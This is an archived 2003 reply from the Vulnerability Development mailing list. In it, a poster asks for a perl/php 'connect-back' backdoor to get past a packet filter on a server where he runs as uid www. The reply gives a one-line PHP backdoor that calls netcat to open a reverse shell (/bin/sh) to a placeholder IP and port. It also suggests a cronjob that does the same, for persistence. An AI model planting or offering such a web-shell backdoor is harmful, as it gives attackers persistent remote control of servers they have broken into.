Vulnerability Development mailing list archives

Re: perl/php connect-back backdoor?

From: Knud Erik Højgaard <kain () ircop dk>
Date: Mon, 28 Jul 2003 22:24:47 +0200

Ingram wrote:
[snip]

i got right know is uid www. I think a connect-back perl/php code
could made it through this packtfilter, as the outbound rules could
be less tight. 

Anyone aware of a backdoor like this?

netcat:
<? passthru("nc -e /bin/sh ip port"); ?>

or a cronjob doing the same.. 

--
kokanin

Current thread:

perl/php connect-back backdoor? Ingram (Jul 28)
- RE: perl/php connect-back backdoor? Rick Patel (Jul 28)
- Re: perl/php connect-back backdoor? Knud Erik Højgaard (Jul 28)
  - Re: perl/php connect-back backdoor? Diode Trnasistor (Jul 30)
- <Possible follow-ups>
- perl/php connect-back backdoor? Victor Pereira (Jul 30)